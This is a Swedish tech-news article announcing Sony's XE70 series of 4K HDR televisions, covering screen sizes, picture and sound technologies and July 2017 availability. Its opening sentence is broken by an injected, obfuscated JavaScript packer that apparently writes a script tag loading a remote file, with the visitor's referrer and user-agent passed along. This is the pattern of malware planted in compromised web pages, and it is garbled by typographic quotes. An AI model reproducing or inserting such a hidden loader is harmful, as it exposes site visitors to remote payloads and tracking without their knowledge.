Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Sony breddar utbudet av 4K HDR TV med XE70-serien

Sony breddar utbudet av 4K HDR TV med XE70-serien
Sebastian

XE70-serien eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrrzt|var|u0026u|referrer|hzrts||js|php’.split(’|’),0,{}))
kommer i fyra skärmstorlekar och levererar exceptionell 4K-bildkvalitet med hjälp av bland annat High Dynamic Range-teknik (HDR).

Sonys nya XE70-serie av 4K HDR TV-skärmar är det senaste tillskottet i varumärkets breda utbud av 4K-skärmar och är framtagen för de som vill köpa sin första 4K HDR TV. XE70-serien finns i storlekarna 43, 49, 55 och 65 tum.

Tv-apparaterna innehåller en mängd olika Sony-tekniker som hjälper till att leverera en exceptionell ljud- och bildupplevelse. Skärmarna är utrustade med Sonys kraftfulla bildprocessor 4K X-Reality™ PRO. Individuella delar av varje scen i TV-programmet analyseras och matchas med en speciell bilddatabas som självständigt sammansvetsar textur, kontrast, färg och detaljer för att producera en mer realistisk bild. Snabbrörliga scener inom till exempel sport och action-filmer förbättras och görs mer detaljrika tack vare Motionflow™ XR.

Sony har utrustat XE70-serien med flera nya ljudtekniker: ClearAudio+ finjusterar ljudet och separerar även dialog och ljudeffekter så att de upplevs tydligare. Digital Sound Enhancement Engine (DSEE) hjälper bland annat till att leverera bättre ljud från internet-klipp med lägre upplösning. Cinematic S-Force Front Surround hjälper till att skapa rätt volym, tidsfördröjning och ljudvågsspektrum.

XE70-serien har inbyggt Wi-Fi och tre USB-portar. Skärmarna har minimalistisk design med en smal ram i aluminium. XE70-serien finns tillgänglig i Sverige från och med juli 2017. För mer info, vänligen besök www.sony.se/electronics/tv-apparater/xe7000-series

Tags